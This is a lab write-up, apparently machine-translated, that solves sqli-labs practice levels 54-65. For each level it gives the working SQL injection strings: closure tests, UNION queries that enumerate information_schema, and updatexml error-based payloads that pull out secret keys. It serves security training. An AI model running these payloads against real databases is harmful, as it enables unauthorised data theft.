当前位置:网站首页>sql-lab (54-65)
sql-lab (54-65)
2022-07-07 12:24:00 【hcjtn】
(54~60)
sql-lab-54
from 54 Turn off and start , The level began to be difficult
54 Off only allows us to enter statements ten times , After ten sentences, the range will check all the database names , Table name , Refresh the column name . So start from this level , All statements are for reference only .
First step , First judge the closing mode :
id=1 'and 1=2 --q
Page error reporting , So the closing method is Single quotation marks
The second step , Judge whether keywords are disabled
The third step Determine the construction idea of the injection statement
Should echo for this page, so use joint query
?id=-1’ union select 1,2,database() – q
The discovery library is named :challenges
?id=-1 ’ union select 1,table_name,3 from information_schema.tables where table_schema=‘challenges’ limit 0,1-- q
Found table name is :ufka71dqts
?id=-1’ union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=‘ufka71dqts’-- q
Found column name is ::id,sessid,secret_JZU6,tryy
?id=-1 ’ union select 1,secret_JZU6,3 from ufka71dqts – q
The query is successful , Submit our query results to :Submit Secret Key
This problem has been successfully solved !
sql-lab-55
Judge the closure ,?id=1)and 1=1-- q
It is found that the closing mode is Brackets
Determine the construction idea of the injection statement
Should echo for this page, so use joint query
?id=-1)union select 1,2,database() – q
The discovery library is named :challenges
?id=-1 )union select 1,table_name,3 from information_schema.tables where table_schema=‘challenges’ limit 0,1-- q
Found table name is :qbj8tdrlxb
?id=-1)union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=‘qbj8tdrlxb’-- q
Found column name is :id,sessid,secret_N7EM,tryy
?id=-1 )union select 1,secret_N7EM,3 from qbj8tdrlxb – q
The query is successful , Submit our query results to :Submit Secret Key
This problem has been successfully solved !
sql-lab-56
Judge the closure ,?id=1’)and 1=1-- q
Determine the construction idea of the injection statement
Should echo for this page, so use joint query
?id=-1’) union select 1,2,database() – q
The discovery library is named :challenges
?id=-1 )union select 1,table_name,3 from information_schema.tables where table_schema=‘challenges’ limit 0,1-- q
Found table name is :okzcd5g9co
?id=-1’)union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=‘okzcd5g9co’-- q
Found column name is ::id,sessid,secret_W8S8,tryy
?id=-1’)union select 1,secret_W8S8,3 from okzcd5g9co – q
The query is successful , Submit our query results to :Submit Secret Key
This problem has been successfully solved !
sql-lab-57
This question is the same as the previous question except for the closing method
Judge the closure ,?id=1"and 1=1-- q
sql-lab-58
First, judge whether it is closed ,?id=1’ and 1=1 – q
Then use the joint query to find that it cannot be used , Then we use error injection .
?id=1’ and updatexml(1,concat(0x7e,database(),0x7e),1)-- q
The discovery library is named :challenges
?id=1’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)-- q
Found table name is :20lvmztx1r
?id=1’ and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘20lvmztx1r’ limit 0,1),0x7e),1)-- q
Found column name is :id,sessid,secret_X8WY,tryy
id=1’ and updatexml(1,concat(0x7e,(select secret_X8WY from 20lvmztx1r limit 0,1),0x7e),1)-- q
The query is successful ,
This problem has been successfully solved !
sql-lab-59
?id=1 and 1=2-- q
?id=1 and updatexml(1,concat(0x7e,database(),0x7e),1)-- q
?id=1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)-- q
?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘fjwx950mdd’ limit 0,1),0x7e),1)-- q
id=1 and updatexml(1,concat(0x7e,(select secret_Z2BD from fjwx950mdd limit 0,1),0x7e),1)-- q
sql-lab-60
?id=1")and 1=2-- q
?id=1") and updatexml(1,concat(0x7e,database(),0x7e),1)-- q
?id=1") and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)-- q
?id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘hmguhc8wji’ limit 0,1),0x7e),1)-- q
id=1") and updatexml(1,concat(0x7e,(select secret_0LPA from hmguhc8wji limit 0,1),0x7e),1)-- q
(61~65)
spl-lab-61
?id=1’))and 1=1-- q
?id=1’)) and updatexml(1,concat(0x7e,database(),0x7e),1)-- q
?id=1’)) and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)-- q
?id=1’)) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘qd5l9mppz3’ limit 0,1),0x7e),1)-- q
?id=1’)) and updatexml(1,concat(0x7e,(select secret_ZHCO from qd5l9mppz3 limit 0,1),0x7e),1)-- q
sql-lab-62~65
In this problem, we find that joint query and error reporting injection can't use anything
First judge the closing mode :
?id=1’)and 1=1-- q
Then use blind injection
It is suggested to write a blind note script .
Since then sql-lab It's over
边栏推荐
- [texture feature extraction] LBP image texture feature extraction based on MATLAB local binary mode [including Matlab source code 1931]
- Matlab implementation of Huffman coding and decoding with GUI interface
- Common locking table processing methods in Oracle
- Camera calibration (2): summary of monocular camera calibration
- 18 basic introduction to divider separator component of fleet tutorial (tutorial includes source code)
- An error occurred when vscade tried to create a file in the target directory: access denied [resolved]
- 超标量处理器设计 姚永斌 第9章 指令执行 摘录
- 《通信软件开发与应用》课程结业报告
- 数据库系统原理与应用教程(010)—— 概念模型与数据模型练习题
- SQL lab 1~10 summary (subsequent continuous update)
猜你喜欢
Several methods of checking JS to judge empty objects
SwiftUI 教程之如何在 2 秒内实现自动滚动功能
金融数据获取(三)当爬虫遇上要鼠标滚轮滚动才会刷新数据的网页(保姆级教程)
[neural network] convolutional neural network CNN [including Matlab source code 1932]
Solutions to cross domain problems
数据库系统原理与应用教程(010)—— 概念模型与数据模型练习题
Common locking table processing methods in Oracle
(待会删)yyds,付费搞来的学术资源,请低调使用!
[filter tracking] strapdown inertial navigation simulation based on MATLAB [including Matlab source code 1935]
Explore cloud database of cloud services together
随机推荐
Fleet tutorial 14 basic introduction to listtile (tutorial includes source code)
Baidu digital person Du Xiaoxiao responded to netizens' shouts online to meet the Shanghai college entrance examination English composition
超标量处理器设计 姚永斌 第10章 指令提交 摘录
<No. 9> 1805. Number of different integers in the string (simple)
源代码防泄密中的技术区别再哪里
wallys/Qualcomm IPQ8072A networking SBC supports dual 10GbE, WiFi 6
Tutorial on the principle and application of database system (008) -- exercises on database related concepts
SQL lab 1~10 summary (subsequent continuous update)
解密GD32 MCU产品家族,开发板该怎么选?
开发一个小程序商城需要多少钱?
Typescript interface inheritance
How to connect 5V serial port to 3.3V MCU serial port?
[full stack plan - programming language C] basic introductory knowledge
EPP+DIS学习之路(1)——Hello world!
Visual Studio 2019 (LocalDB)\MSSQLLocalDB SQL Server 2014 数据库版本为852无法打开,此服务器支持782版及更低版本
Steps of redis installation and self startup configuration under CentOS system
数据库系统原理与应用教程(009)—— 概念模型与数据模型
NPC Jincang was invited to participate in the "aerospace 706" I have an appointment with aerospace computer "national Partner Conference
Several methods of checking JS to judge empty objects
TypeScript 接口继承